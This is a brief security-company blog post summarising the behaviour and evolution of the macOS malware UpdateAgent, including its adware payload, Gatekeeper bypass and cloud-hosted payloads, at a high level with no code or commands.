MacOS Malware UpdateAgent Grows Increasingly Malicious

MacOS-Malware-UpdateAgent-Grows-Increasingly-Malicious.

 

UpdateAgent, a macOS malware, was discovered to have been active for nearly 14 months. As a rudimentary infostealer, it began circulating about November or December 2020. The malware, on the other hand, is becoming more dangerous by the day as its creators continue to improve it.

Additional capabilities

  • Adload, an aggressive second-stage advertising payload that instals a persistent backdoor, is now part of the malware’s functionality.
  • Advertisements and promotions are injected into search results and web pages by the adware. It also uses a web proxy to carry out a man-in-the-middle attack. This allows the attackers to steal ad income from the owners of official websites.
  • It sends “heartbeats” to tell attackers that the malware is still active, in addition to providing data to the attacker server.
  • UpdateAgent can collect SPHardwaretype and system profile data during the reconnaissance phase, revealing the serial number of the victim system.

Why is this significant?

  1. The malware imitates legitimate software, such as help agents or video games, and spreads through hacked or malicious websites to fool its victims.
  2. It can make use of the capabilities of Mac devices. Gatekeeper controls, a security mechanism that ensures that only trustworthy apps are installed, are bypassed by UpdateAgent.
  3. It can take advantage of current user permissions to carry out nefarious actions and then remove the evidence.
  4. Furthermore, the trojan makes use of public cloud infrastructure, such as CloudFront and Amazon S3, to host additional payloads.

Last But Not Least

Organizations must install defensive solutions that provide security across all platforms, as modern work environments rely on a variety of devices and operating systems. This is emphasised even more by UpdateAgent’s evolution. The malware creators have evolved a simple data stealer into a complex, persistent, and aggressive pathogen.

By IEMA IEMLabs

IEMLabs is an ISO 27001:2013 and ISO 9001:2015 certified company, we are also a proud member of EC Council, NASSCOM, Data Security Council of India (DSCI), Indian Chamber of Commerce (ICC), U.S. Chamber of Commerce, and Confederation of Indian Industry (CII). The company was established in 2016 with a vision in mind to provide Cyber Security to the digital world and make them Hack Proof. The question is why are we suddenly talking about Cyber Security and all this stuff? With the development of technology, more and more companies are shifting their business to Digital World which is resulting in the increase in Cyber Crimes.

Leave a comment

Your email address will not be published.

This site is under maintenance,
some features might not work!!!